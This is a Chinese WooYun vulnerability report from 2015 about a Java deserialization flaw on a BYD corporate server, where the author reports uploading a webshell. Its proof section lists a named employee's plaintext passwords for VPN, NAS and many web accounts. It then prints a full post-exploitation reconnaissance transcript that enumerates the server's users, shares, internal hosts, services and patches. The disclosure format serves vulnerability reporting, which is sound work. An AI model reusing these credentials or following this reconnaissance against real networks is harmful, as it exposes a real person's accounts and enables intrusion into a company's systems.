当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0164488

漏洞标题:比亚迪股份有限公司某系统服务器存在“Java 反序列化”漏洞,并getshell

相关厂商:比亚迪股份有限公司

漏洞作者: 朱元璋

提交时间:2015-12-27 21:20

修复时间:2016-02-12 18:49

公开时间:2016-02-12 18:49

漏洞类型:系统/服务补丁不及时

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-27: 细节已通知厂商并且等待厂商处理中
2015-12-31: 厂商已经确认,细节仅向厂商公开
2016-01-10: 细节向核心白帽子及相关领域专家公开
2016-01-20: 细节向普通白帽子公开
2016-01-30: 细节向实习白帽子公开
2016-02-12: 细节向公众公开

简要描述:

敏感机密信息,一览无遗

详细说明:

0.jpg


00.jpg


地址**.**.**.**:8080/存在“Java 反序列化”漏洞

000.png


直接上传木马到服务器中

1.jpg

2.jpg

漏洞证明:

站点	姓名	密码	备注	
http://**.**.**.**/index.php JoshZou 901466
https://**.**.**.**/authentication/default.aspx?r=**.**.**.**/CertApp/default.aspx&s=true Zouyingxi 200237 "Member ID: 709032
PMP No.: 326695"
https://**.**.**.**/CertApp/Registry.aspx 核查PMP身份
http://**.**.**.**/jobsathp/content/howtoapply/applyform.asp?Lang=ZHcn JoshZou 434207
http://**.**.**.**/tj_search.asp?Hospital_area=2000&hosp=&item_type=0&item_price=0&page=2 JoshZou 2Josh@o06 健康体检
http://**.**.**.**/forums/login.aspx?ReturnUrl=/forums/Msgs/default.aspx?MessageID JoshZou 2Josh@o06 SAP论坛
http://**.**.**.**/UserLogin.aspx ScotterZou 2Josh@o06 CSDN
http://**.**.**.**/index.php JoshZou 2Josh@o05 Delphi书籍下载
QQ:625079289 Joshua 2Josh@o06
http://**.**.**.**/Register/login2.aspx JoshZou 2Josh@o05
http://**.**.**.**/bbs/index.php joshzou 2Josh@o06 Eclipse社区 zou.yingxi@**.**.**.**
http://**.**.**.**/p/fl.php Joshzouyx 2Josh2o04 搜狐闪邮
http://**.**.**.** JoshZou 2Josh@o04 SAP论坛
\\NAS.**.**.**.** Zouyingxi 123456@abcD
\\NAS.**.**.**.** Zouyingxi 12345@cc
https://vpn.**.**.**.** Zouyingxi zyx@byd2007
http://**.**.**.**/pmi/PMI_Member/PDUlogin.php3 申请PDU
http://**.**.**.**/aia/pmi/pmi.html 查询PDU申请结果
http://**.**.**.** p491375 2Josh@o04 SAP论坛
http://**.**.**.**/cgi-bin/saploginout.cgi?/Forum=31 JoshZou A214736259 SAP之家
http://**.**.**.**/index.asp JoshZou 2Josh@o06 TNT论坛


[*] 磁盘列表 [ C:D:E:F:G: ]
G:\软件开发部\JBOSS\server\default\deploy\Invoice.war\Invoice\> whoami
nwcp\zouyingxi
系统找不到指定的路径。
G:\软件开发部\JBOSS\bin\> net user
\\NWCP 的用户帐户
-------------------------------------------------------------------------------
administrator ASPNET audit
bill byd-backup CWBD285070
guest huangxianman IUSR_ZFS
IWAM_ZFS KeyUser SAP
SAPR3 sapuser SQLDebugger
srvlocaladmin tibet ywzhang
zouyingxi
命令成功完成。
系统找不到指定的路径。
G:\软件开发部\JBOSS\bin\> net share
共享名 资源 注释
-------------------------------------------------------------------------------
C$ C:\ 默认共享
ADMIN$ C:\WINDOWS 远程管理
IPC$ 远程 IPC
G$ G:\ 默认共享
02_蓝图方案 G:\财务项目文档库\SAP票据管理系统\02_蓝图方案

04_项目测试 G:\财务项目文档库\SAP票据管理系统\04_项目测试

BW_IT_推广 G:\财务项目文档库\BW_IT_推广
BYD_IT产业群AP项目
G:\财务项目文档库\BYD_IT产业群AP项目

BYDAUTO_业务系统流程改造项目
G:\财务项目文档库\BYDAUTO_业务系统流程改造项目

gjyh G:\财务项目文档库\gjyh
PBC报表开发项目
G:\SAP项目部\PBC报表开发项目
PS模块汽车产业11部试点项目
G:\财务项目文档库\PS模块汽车产业11部试点项目

SAP G:\SAP
SAP发票管理系统
G:\财务项目文档库\SAP发票管理系统

SAP应收流程优化
G:\财务项目文档库\SAP应收流程优化

SAP票据管理系统
G:\财务项目文档库\SAP票据管理系统

SAP项目模板 G:\财务项目文档库\SAP项目模板
一部联产品项目
G:\财务项目文档库\一部联产品项目

上海SAP项目 G:\财务项目文档库\上海SAP项目
业务分析小组 G:\财务项目文档库\业务分析小组
九部华硕项目 G:\财务项目文档库\九部华硕项目
供应链管理平台项目
G:\财务项目文档库\供应链管理平台项目

信息资源处 G:\财务项目文档库\信息资源处
关务软件项目 G:\财务项目文档库\关务软件项目
利润中心项目文档库
G:\财务项目文档库\利润中心项目文档库

北京SAP项目 G:\财务项目文档库\北京SAP项目
备份 G:\备份
对公费用项目 G:\财务项目文档库\对公费用项目
应付优化项目 G:\财务项目文档库\应付优化项目
应付测试 G:\财务项目文档库\应付测试
报销优化项目 G:\财务项目文档库\报销优化项目
推土机项目 G:\财务项目文档库\推土机项目
文档标准化 G:\财务项目文档库\文档标准化
权限清理项目 G:\财务项目文档库\权限清理项目
汽车整车SD项目
G:\财务项目文档库\汽车整车SD项目

汽车标准成本和实际成本还原报表
G:\财务项目文档库\汽车标准成本和实际成本还原报表

汽车金融接口项目
G:\财务项目文档库\汽车金融接口项目

西安项目文档 G:\财务项目文档库\西安项目文档
财务合并报表优化项目文档库
G:\财务项目文档库\财务合并报表优化项目文档库

资产优化项目 G:\财务项目文档库\资产优化项目
项目文件整理 G:\财务项目文档库\项目文件整理
BW项目文档库
G:\财务项目文档库\BW项目文档库

命令成功完成。
系统找不到指定的路径。
G:\软件开发部\JBOSS\bin\> net view
服务器名称 注释
-------------------------------------------------------------------------------
\\AUTOFTP
\\BID
\\BYD-ASN
\\BYD-BSP
\\BYD-FC
\\BYD-PO
\\BYD-SCMASN
\\BYD-SCMFC
\\BYD-SCMPO
\\BYDPOWER
\\DLY-FUTIAN-001
\\DLY-FUTIAN-002
\\EDI1 EDI1
\\EDI5
\\LED-EIP
\\NWCP
\\PS-CC-SMS1
\\PS-CC4-ELECINTE
\\PS-CC4-SFTP2
\\PS-DIV1-FORKLIF
\\PS-DIV5-FTP02
\\PS-DLKX-BMAS01
\\PS-DMSCS-WEB1
\\PS-DMSPRD-EXCH
\\PS-DMSPRD-WEB
\\PS-DMSPRD-WEB01
\\PS-EDI-PROD2
\\PS-EDI-TEST02
\\PS-EDI-TEST03
\\PS-EDI-TEST04
\\PS-ERP-MDMFTP
\\PS-ERP-MDMWEB2
\\PS-ERP-MDMWEB3
\\PS-IPRL-PATENT
\\PS-MDM-APACHE
\\PS-SALES-MAS
\\PS-SAP-SAPROUTE
\\PS-SRM-APS01
\\PS-ZCB-YKTDB01
\\SFTP SFTP
\\SPECIAL
\\SVCTAG-DQ4KQ2X
\\WIN-4APDCGTCQRC
\\XUNIJIIIS
命令成功完成。
系统找不到指定的路径。
G:\软件开发部\JBOSS\bin\> net start
已经启动以下 Windows 服务:
Altiris Monitor Agent
Application Experience Lookup Service
Application Layer Gateway Service
Automatic Updates
COM+ Event System
Computer Browser
Cryptographic Services
DameWare Mini Remote Control
DCOM Server Process Launcher
DHCP Client
Distributed Link Tracking Client
Distributed Transaction Coordinator
DNS Client
Error Reporting Service
Event Log
Help and Support
HID Input Service
IPSEC Services
Java Quick Starter
Logical Disk Manager
McAfee Framework 服务
Microsoft Search
Network Connections
Network Location Awareness (NLA)
NT LM Security Support Provider
Plug and Play
Print Spooler
Protected Storage
Remote Access Auto Connection Manager
Remote Access Connection Manager
Remote Procedure Call (RPC)
Remote Procedure Call (RPC) Locator
Remote Registry
Secondary Logon
Security Accounts Manager
Server
Shell Hardware Detection
SNMP Service
Symantec Endpoint Protection
Symantec Management Agent
System Event Notification
Task Scheduler
TCP/IP NetBIOS Helper
Telephony
Terminal Services
Windows Audio
Windows Firewall/Internet Connection Sharing (ICS)
Windows Management Instrumentation
Windows Time
Wireless Configuration
Workstation
主动防御
命令成功完成。
系统找不到指定的路径。
G:\软件开发部\JBOSS\bin\> netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP **.**.**.**:135 **.**.**.**:0 LISTENING 696
TCP **.**.**.**:445 **.**.**.**:0 LISTENING 4
TCP **.**.**.**:1011 **.**.**.**:0 LISTENING 5540
TCP **.**.**.**:1025 **.**.**.**:0 LISTENING 1100
TCP **.**.**.**:1027 **.**.**.**:0 LISTENING 456
TCP **.**.**.**:3389 **.**.**.**:0 LISTENING 2460
TCP **.**.**.**:6129 **.**.**.**:0 LISTENING 1328
TCP **.**.**.**:8080 **.**.**.**:0 LISTENING 8288
TCP **.**.**.**:8081 **.**.**.**:0 LISTENING 1548
TCP **.**.**.**:139 **.**.**.**:0 LISTENING 4
TCP **.**.**.**:445 **.**.**.**:1382 ESTABLISHED 4
TCP **.**.**.**:445 **.**.**.**:52264 ESTABLISHED 4
TCP **.**.**.**:445 **.**.**.**:62744 ESTABLISHED 4
TCP **.**.**.**:445 **.**.**.**:63566 ESTABLISHED 4
TCP **.**.**.**:445 **.**.**.**:55620 ESTABLISHED 4
TCP **.**.**.**:1382 **.**.**.**:445 ESTABLISHED 4
TCP **.**.**.**:2292 **.**.**.**:1433 ESTABLISHED 8288
TCP **.**.**.**:2318 **.**.**.**:445 TIME_WAIT 0
TCP **.**.**.**:2324 **.**.**.**:1433 TIME_WAIT 0
TCP **.**.**.**:2327 **.**.**.**:139 TIME_WAIT 0
TCP **.**.**.**:2328 **.**.**.**:1433 TIME_WAIT 0
TCP **.**.**.**:2329 **.**.**.**:1433 TIME_WAIT 0
TCP **.**.**.**:2485 **.**.**.**:1527 ESTABLISHED 8288
TCP **.**.**.**:2486 **.**.**.**:1527 ESTABLISHED 8288
TCP **.**.**.**:2487 **.**.**.**:1527 ESTABLISHED 8288
TCP **.**.**.**:445 **.**.**.**:1163 ESTABLISHED 4
TCP **.**.**.**:1031 **.**.**.**:0 LISTENING 2588
TCP **.**.**.**:1069 **.**.**.**:6139 ESTABLISHED 3816
TCP **.**.**.**:1090 **.**.**.**:0 LISTENING 8288
TCP **.**.**.**:1091 **.**.**.**:0 LISTENING 8288
TCP **.**.**.**:1098 **.**.**.**:0 LISTENING 8288
TCP **.**.**.**:1099 **.**.**.**:0 LISTENING 8288
TCP **.**.**.**:1163 **.**.**.**:445 ESTABLISHED 4
TCP **.**.**.**:2319 **.**.**.**:445 TIME_WAIT 0
TCP **.**.**.**:2441 **.**.**.**:2442 ESTABLISHED 8288
TCP **.**.**.**:2442 **.**.**.**:2441 ESTABLISHED 8288
TCP **.**.**.**:2443 **.**.**.**:2444 ESTABLISHED 8288
TCP **.**.**.**:2444 **.**.**.**:2443 ESTABLISHED 8288
TCP **.**.**.**:2445 **.**.**.**:2446 ESTABLISHED 8288
TCP **.**.**.**:2446 **.**.**.**:2445 ESTABLISHED 8288
TCP **.**.**.**:2447 **.**.**.**:2448 ESTABLISHED 8288
TCP **.**.**.**:2448 **.**.**.**:2447 ESTABLISHED 8288
TCP **.**.**.**:2449 **.**.**.**:2450 ESTABLISHED 8288
TCP **.**.**.**:2450 **.**.**.**:2449 ESTABLISHED 8288
TCP **.**.**.**:3873 **.**.**.**:0 LISTENING 8288
TCP **.**.**.**:4446 **.**.**.**:0 LISTENING 8288
TCP **.**.**.**:4712 **.**.**.**:0 LISTENING 8288
TCP **.**.**.**:4713 **.**.**.**:0 LISTENING 8288
TCP **.**.**.**:4714 **.**.**.**:0 LISTENING 8288
TCP **.**.**.**:5152 **.**.**.**:0 LISTENING 1492
TCP **.**.**.**:5152 **.**.**.**:3688 CLOSE_WAIT 1492
TCP **.**.**.**:5445 **.**.**.**:0 LISTENING 8288
TCP **.**.**.**:5455 **.**.**.**:0 LISTENING 8288
TCP **.**.**.**:5500 **.**.**.**:0 LISTENING 8288
TCP **.**.**.**:5501 **.**.**.**:0 LISTENING 8288
TCP **.**.**.**:6139 **.**.**.**:0 LISTENING 1328
TCP **.**.**.**:6139 **.**.**.**:1069 ESTABLISHED 1328
TCP **.**.**.**:8009 **.**.**.**:0 LISTENING 8288
TCP **.**.**.**:8083 **.**.**.**:0 LISTENING 8288
TCP **.**.**.**:139 **.**.**.**:0 LISTENING 4
TCP **.**.**.**:2320 **.**.**.**:445 TIME_WAIT 0
TCP **.**.**.**:2326 **.**.**.**:139 TIME_WAIT 0
TCP **.**.**.**:3255 **.**.**.**:80 ESTABLISHED 1800
TCP **.**.**.**:4709 **.**.**.**:80 ESTABLISHED 1800
TCP **.**.**.**:8080 **.**.**.**:51632 ESTABLISHED 8288
TCP **.**.**.**:8080 **.**.**.**:51633 ESTABLISHED 8288
TCP **.**.**.**:8080 **.**.**.**:51634 ESTABLISHED 8288
TCP **.**.**.**:8080 **.**.**.**:51635 ESTABLISHED 8288
TCP **.**.**.**:8080 **.**.**.**:51636 ESTABLISHED 8288
TCP **.**.**.**:8080 **.**.**.**:28579 ESTABLISHED 8288
TCP **.**.**.**:8080 **.**.**.**:28587 ESTABLISHED 8288
TCP **.**.**.**:8080 **.**.**.**:28601 ESTABLISHED 8288
TCP **.**.**.**:8080 **.**.**.**:28602 ESTABLISHED 8288
TCP **.**.**.**:8080 **.**.**.**:28603 ESTABLISHED 8288
TCP **.**.**.**:8080 **.**.**.**:28604 ESTABLISHED 8288
TCP **.**.**.**:8080 **.**.**.**:28605 ESTABLISHED 8288
TCP **.**.**.**:8080 **.**.**.**:28606 ESTABLISHED 8288
TCP **.**.**.**:8080 **.**.**.**:28607 ESTABLISHED 8288
TCP **.**.**.**:8080 **.**.**.**:28608 ESTABLISHED 8288
TCP **.**.**.**:8080 **.**.**.**:28609 ESTABLISHED 8288
TCP **.**.**.**:8080 **.**.**.**:28610 ESTABLISHED 8288
TCP **.**.**.**:8080 **.**.**.**:20180 TIME_WAIT 0
TCP **.**.**.**:8080 **.**.**.**:20181 TIME_WAIT 0
TCP **.**.**.**:8080 **.**.**.**:20185 TIME_WAIT 0
TCP **.**.**.**:8080 **.**.**.**:20186 TIME_WAIT 0
TCP **.**.**.**:8080 **.**.**.**:20187 TIME_WAIT 0
TCP **.**.**.**:8080 **.**.**.**:20188 TIME_WAIT 0
TCP **.**.**.**:8080 **.**.**.**:5212 CLOSE_WAIT 8288
TCP **.**.**.**:8080 **.**.**.**:1762 ESTABLISHED 8288
TCP **.**.**.**:8080 **.**.**.**:1763 ESTABLISHED 8288
TCP **.**.**.**:8080 **.**.**.**:3336 TIME_WAIT 0
TCP **.**.**.**:8080 **.**.**.**:56131 FIN_WAIT_2 8288
TCP **.**.**.**:8080 **.**.**.**:56132 FIN_WAIT_2 8288
TCP **.**.**.**:8080 **.**.**.**:56133 FIN_WAIT_2 8288
TCP **.**.**.**:8080 **.**.**.**:56134 FIN_WAIT_2 8288
TCP **.**.**.**:8080 **.**.**.**:56135 FIN_WAIT_2 8288
TCP **.**.**.**:8080 **.**.**.**:56141 ESTABLISHED 8288
TCP **.**.**.**:8080 **.**.**.**:56144 FIN_WAIT_2 8288
TCP **.**.**.**:8080 **.**.**.**:56145 ESTABLISHED 8288
TCP **.**.**.**:8080 **.**.**.**:50211 TIME_WAIT 0
TCP **.**.**.**:8080 **.**.**.**:41083 TIME_WAIT 0
TCP **.**.**.**:8080 **.**.**.**:41090 TIME_WAIT 0
TCP **.**.**.**:8080 **.**.**.**:41098 TIME_WAIT 0
TCP **.**.**.**:8080 **.**.**.**:51988 TIME_WAIT 0
TCP **.**.**.**:8080 **.**.**.**:52016 ESTABLISHED 8288
TCP **.**.**.**:8080 **.**.**.**:50256 TIME_WAIT 0
TCP **.**.**.**:8080 **.**.**.**:50257 TIME_WAIT 0
TCP **.**.**.**:8080 **.**.**.**:50258 TIME_WAIT 0
TCP **.**.**.**:8080 **.**.**.**:50259 TIME_WAIT 0
TCP **.**.**.**:8080 **.**.**.**:50260 TIME_WAIT 0
TCP **.**.**.**:8080 **.**.**.**:50261 TIME_WAIT 0
TCP **.**.**.**:8080 **.**.**.**:50268 TIME_WAIT 0
TCP **.**.**.**:8080 **.**.**.**:33083 TIME_WAIT 0
TCP **.**.**.**:8080 **.**.**.**:33263 TIME_WAIT 0
TCP **.**.**.**:8080 **.**.**.**:37419 ESTABLISHED 8288
TCP **.**.**.**:8080 **.**.**.**:37610 ESTABLISHED 8288
TCP **.**.**.**:8080 **.**.**.**:37628 ESTABLISHED 8288
TCP **.**.**.**:8080 **.**.**.**:37631 ESTABLISHED 8288
TCP **.**.**.**:8080 **.**.**.**:37632 ESTABLISHED 8288
TCP **.**.**.**:8080 **.**.**.**:1603 TIME_WAIT 0
UDP **.**.**.**:161 *:* 1820
UDP **.**.**.**:445 *:* 4
UDP **.**.**.**:500 *:* 456
UDP **.**.**.**:2414 *:* 2844
UDP **.**.**.**:2415 *:* 2844
UDP **.**.**.**:3600 *:* 1800
UDP **.**.**.**:3993 *:* 1800
UDP **.**.**.**:4037 *:* 2844
UDP **.**.**.**:4268 *:* 2844
UDP **.**.**.**:4272 *:* 2844
UDP **.**.**.**:4500 *:* 456
UDP **.**.**.**:4568 *:* 2844
UDP **.**.**.**:8081 *:* 1548
UDP **.**.**.**:8082 *:* 1548
UDP **.**.**.**:123 *:* 824
UDP **.**.**.**:137 *:* 4
UDP **.**.**.**:138 *:* 4
UDP **.**.**.**:123 *:* 824
UDP **.**.**.**:1482 *:* 1800
UDP **.**.**.**:123 *:* 824
UDP **.**.**.**:137 *:* 4
UDP **.**.**.**:138 *:* 4
系统找不到指定的路径。
G:\软件开发部\JBOSS\bin\> tasklist /svc
映像名称 PID 服务
========================= ======== ============================================
System Idle Process 0 暂缺
System 4 暂缺
smss.exe 320 暂缺
csrss.exe 368 暂缺
winlogon.exe 396 暂缺
services.exe 444 Eventlog, PlugPlay
lsass.exe 456 NtLmSsp, PolicyAgent, ProtectedStorage,
SamSs
svchost.exe 612 DcomLaunch
svchost.exe 696 RpcSs
svchost.exe 776 Dhcp, Dnscache
svchost.exe 824 LmHosts, W32Time
svchost.exe 840 AeLookupSvc, AudioSrv, Browser, CryptSvc,
dmserver, EventSystem, helpsvc, HidServ,
lanmanserver, lanmanworkstation, Netman,
Nla, RasAuto, RasMan, Schedule, seclogon,
SENS, SharedAccess, ShellHWDetection,
TrkWks, winmgmt, wuauserv, WZCSVC
ZhuDongFangYu.exe 868 ZhuDongFangYu
spoolsv.exe 1076 Spooler
msdtc.exe 1100 MSDTC
DWRCS.EXE 1328 DWMRCS
svchost.exe 1360 ERSvc
jqs.exe 1492 JavaQuickStarterService
FrameworkService.exe 1548 McAfeeFramework
svchost.exe 1724 RemoteRegistry
locator.exe 1740 RpcLocator
ccSvcHst.exe 1788 SepMasterService
snmp.exe 1820 SNMP
svchost.exe 1856 TapiSrv
mssearch.exe 1972 MSSEARCH
svchost.exe 2460 TermService
alg.exe 2588 ALG
wmiprvse.exe 2724 暂缺
explorer.exe 3752 暂缺
DWRCST.EXE 3816 暂缺
jusched.exe 3884 暂缺
UdaterUI.exe 3892 暂缺
ctfmon.exe 3928 暂缺
McTray.exe 3948 暂缺
csrss.exe 3368 暂缺
winlogon.exe 1596 暂缺
rdpclip.exe 688 暂缺
conime.exe 1072 暂缺
taskmgr.exe 2232 暂缺
logon.scr 1372 暂缺
csrss.exe 3856 暂缺
winlogon.exe 3100 暂缺
rdpclip.exe 536 暂缺
explorer.exe 1676 暂缺
jusched.exe 2716 暂缺
360tray.exe 1800 暂缺
ctfmon.exe 3208 暂缺
360sd.exe 3956 暂缺
360rp.exe 2844 暂缺
SoftMgrLite.exe 4140 暂缺
AeXNSAgent.exe 8052 AeXNSClient
AeXAgentUIHost.exe 4328 暂缺
AeXAgentUIHost.exe 7672 暂缺
AeXMetricProv.exe 5540 MetricProvider
wmiprvse.exe 7432 暂缺
AeXSMLogUpload.exe 10244 暂缺
AeXSMAppDetector.exe 7416 暂缺
cmd.exe 3336 暂缺
java.exe 8288 暂缺
dxdiag.exe 13212 暂缺
naPrdMgr.exe 15844 暂缺
cmd.exe 14852 暂缺
tasklist.exe 14524 暂缺
系统找不到指定的路径。
G:\软件开发部\JBOSS\bin\> ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : NWCP
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter wan:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Broadcom BCM5708C NetXtreme II GigE (NDIS VBD Client)
Physical Address. . . . . . . . . : 00-1A-A0-31-53-9D
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : **.**.**.**
Subnet Mask . . . . . . . . . . . : **.**.**.**
Default Gateway . . . . . . . . . : **.**.**.**
DNS Servers . . . . . . . . . . . : **.**.**.**
Ethernet adapter lan:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Broadcom BCM5708C NetXtreme II GigE (NDIS VBD Client) #2
Physical Address. . . . . . . . . : 00-1A-A0-31-53-9F
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : **.**.**.**
Subnet Mask . . . . . . . . . . . : **.**.**.**
Default Gateway . . . . . . . . . :
DNS Servers . . . . . . . . . . . : **.**.**.**
**.**.**.**
系统找不到指定的路径。
G:\软件开发部\JBOSS\bin\> systeminfo
主机名: NWCP
OS 名称: Microsoft(R) Windows(R) Server 2003, Enterprise Edition
OS 版本: 5.2.3790 Service Pack 2 Build 3790
OS 制造商: Microsoft Corporation
OS 配置: 独立服务器
OS 构件类型: Multiprocessor Free
注册的所有人: mrpadmin
注册的组织: byd
产品 ID: 69813-640-8571313-45610
初始安装日期: 2007-7-9, 16:45:50
系统启动时间: 91 天 16 小时 58 分 2 秒
系统制造商: Dell Inc.
系统型号: PowerEdge 2950
系统类型: X86-based PC
处理器: 安装了 4 个处理器。
[01]: x86 Family 6 Model 15 Stepping 6 GenuineIntel ~2992 Mhz
[02]: x86 Family 6 Model 15 Stepping 6 GenuineIntel ~2992 Mhz
[03]: x86 Family 6 Model 15 Stepping 6 GenuineIntel ~2992 Mhz
[04]: x86 Family 6 Model 15 Stepping 6 GenuineIntel ~2992 Mhz
BIOS 版本: DELL - 1
Windows 目录: C:\WINDOWS
系统目录: C:\WINDOWS\system32
启动设备: \Device\HarddiskVolume2
系统区域设置: zh-cn;中文(中国)
输入法区域设置: zh-cn;中文(中国)
时区: (GMT+08:00) 北京,重庆,香港特别行政区,乌鲁木齐
物理内存总量: 32,767 MB
可用的物理内存: 31,055 MB
页面文件: 最大值: 34,448 MB
页面文件: 可用: 32,573 MB
页面文件: 使用中: 1,875 MB
页面文件位置: C:\pagefile.sys
域: WORKGROUP
登录服务器: \\NWCP
修补程序: 安装了 421 个修补程序。
[01]: File 1
[02]: File 1
[03]: File 1
[04]: File 1
[05]: File 1
[06]: File 1
[07]: File 1
[08]: File 1
[09]: File 1
[10]: File 1
[11]: File 1
[12]: File 1
[13]: File 1
[14]: File 1
[15]: File 1
[16]: File 1
[17]: File 1
[18]: File 1
[19]: File 1
[20]: File 1
[21]: File 1
[22]: File 1
[23]: File 1
[24]: File 1
[25]: File 1
[26]: File 1
[27]: File 1
[28]: File 1
[29]: File 1
[30]: File 1
[31]: File 1
[32]: File 1
[33]: File 1
[34]: File 1
[35]: File 1
[36]: File 1
[37]: File 1
[38]: File 1
[39]: File 1
[40]: File 1
[41]: File 1
[42]: File 1
[43]: File 1
[44]: File 1
[45]: File 1
[46]: File 1
[47]: File 1
[48]: File 1
[49]: File 1
[50]: File 1
[51]: File 1
[52]: File 1
[53]: File 1
[54]: File 1
[55]: File 1
[56]: File 1
[57]: File 1
[58]: File 1
[59]: File 1
[60]: File 1
[61]: File 1
[62]: File 1
[63]: File 1
[64]: File 1
[65]: File 1
[66]: File 1
[67]: File 1
[68]: File 1
[69]: File 1
[70]: File 1
[71]: File 1
[72]: File 1
[73]: File 1
[74]: File 1
[75]: File 1
[76]: File 1
[77]: File 1
[78]: File 1
[79]: File 1
[80]: File 1
[81]: File 1
[82]: File 1
[83]: File 1
[84]: File 1
[85]: File 1
[86]: File 1
[87]: File 1
[88]: File 1
[89]: File 1
[90]: File 1
[91]: File 1
[92]: File 1
[93]: File 1
[94]: File 1
[95]: File 1
[96]: File 1
[97]: File 1
[98]: File 1
[99]: File 1
[100]: File 1
[101]: File 1
[102]: File 1
[103]: File 1
[104]: File 1
[105]: File 1
[106]: File 1
[107]: File 1
[108]: File 1
[109]: File 1
[110]: File 1
[111]: File 1
[112]: File 1
[113]: File 1
[114]: File 1
[115]: File 1
[116]: File 1
[117]: File 1
[118]: File 1
[119]: File 1
[120]: File 1
[121]: File 1
[122]: File 1
[123]: File 1
[124]: File 1
[125]: File 1
[126]: File 1
[127]: File 1
[128]: File 1
[129]: File 1
[130]: File 1
[131]: File 1
[132]: File 1
[133]: File 1
[134]: File 1
[135]: File 1
[136]: File 1
[137]: File 1
[138]: File 1
[139]: File 1
[140]: File 1
[141]: File 1
[142]: File 1
[143]: File 1
[144]: File 1
[145]: File 1
[146]: File 1
[147]: File 1
[148]: File 1
[149]: File 1
[150]: File 1
[151]: File 1
[152]: File 1
[153]: File 1
[154]: File 1
[155]: File 1
[156]: File 1
[157]: File 1
[158]: File 1
[159]: File 1
[160]: File 1
[161]: File 1
[162]: File 1
[163]: File 1
[164]: File 1
[165]: File 1
[166]: File 1
[167]: File 1
[168]: File 1
[169]: File 1
[170]: File 1
[171]: File 1
[172]: File 1
[173]: File 1
[174]: File 1
[175]: File 1
[176]: File 1
[177]: File 1
[178]: File 1
[179]: File 1
[180]: File 1
[181]: File 1
[182]: File 1
[183]: File 1
[184]: File 1
[185]: File 1
[186]: File 1
[187]: File 1
[188]: File 1
[189]: File 1
[190]: File 1
[191]: File 1
[192]: File 1
[193]: File 1
[194]: File 1
[195]: File 1
[196]: File 1
[197]: File 1
[198]: File 1
[199]: File 1
[200]: File 1
[201]: File 1
[202]: File 1
[203]: File 1
[204]: Q147222
[205]: KB2698032 - QFE
[206]: KB2742604 - QFE
[207]: KB2901115 - QFE
[208]: KB2972207 - QFE
[209]: KB3037572 - QFE
[210]: KB933854 - QFE
[211]: KB979907 - QFE
[212]: SP1 - SP
[213]: KB928365 - Update
[214]: KB975558_WM8
[215]: KB925398_WMP64
[216]: KB889101 - Service Pack
[217]: KB914961 - Service Pack
[218]: KB2115168 - Update
[219]: KB2229593 - Update
[220]: KB2296011 - Update
[221]: KB2347290 - Update
[222]: KB2360937 - Update
[223]: KB2378111 - Update
[224]: KB2387149 - Update
[225]: KB2419635 - Update
[226]: KB2423089 - Update
[227]: KB2440591 - Update
[228]: KB2443105 - Update
[229]: KB2478960 - Update
[230]: KB2478971 - Update
[231]: KB2483185 - Update
[232]: KB2485663 - Update
[233]: KB2506212 - Update
[234]: KB2524375 - Update
[235]: KB2676562 - Update
[236]: KB2685939 - Update
[237]: KB2698032 - Update
[238]: KB2705219 - Update
[239]: KB2705219-v2 - Update
[240]: KB2712808 - Update
[241]: KB2722913 - Update
[242]: KB2724197 - Update
[243]: KB2727528 - Update
[244]: KB2731847 - Update
[245]: KB2736233 - Update
[246]: KB2742604 - Update
[247]: KB2744842 - Update
[248]: KB2761226 - Update
[249]: KB2770660 - Update
[250]: KB2780091 - Update
[251]: KB2803821-v2 - Update
[252]: KB2807986 - Update
[253]: KB2820917 - Update
[254]: KB2834886 - Update
[255]: KB2847311 - Update
[256]: KB2859537 - Updat
网卡: 安装了 2 个 NIC。
[01]: Broadcom BCM5708C NetXtreme II GigE (NDIS VBD Client)
连接名: wan
启用 DHCP: 否
IP 地址
[01]: **.**.**.**
[02]: Broadcom BCM5708C NetXtreme II GigE (NDIS VBD Client)
连接名: lan
启用 DHCP: 否
IP 地址
[01]: **.**.**.**
系统找不到指定的路径。
G:\软件开发部\JBOSS\bin\> arp -a
Interface: **.**.**.** --- 0x2
Internet Address Physical Address Type
**.**.**.** 00-50-56-81-00-78 dynamic
**.**.**.** 00-16-4d-71-88-b6 dynamic
Interface: **.**.**.** --- 0x3
Internet Address Physical Address Type
**.**.**.** 00-50-56-81-5f-41 dynamic
**.**.**.** 00-50-56-81-08-ea dynamic
**.**.**.** 3c-e5-a6-73-77-bc dynamic
系统找不到指定的路径。
G:\软件开发部\JBOSS\bin\>

修复方案:

加强安全意识

版权声明:转载请注明来源 朱元璋@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-12-31 19:17

厂商回复:

CNVD未直接复现所述情况,已经转由CNCERT下发给广东分中心,由其后续协调网站管理单位处置。

最新状态:

暂无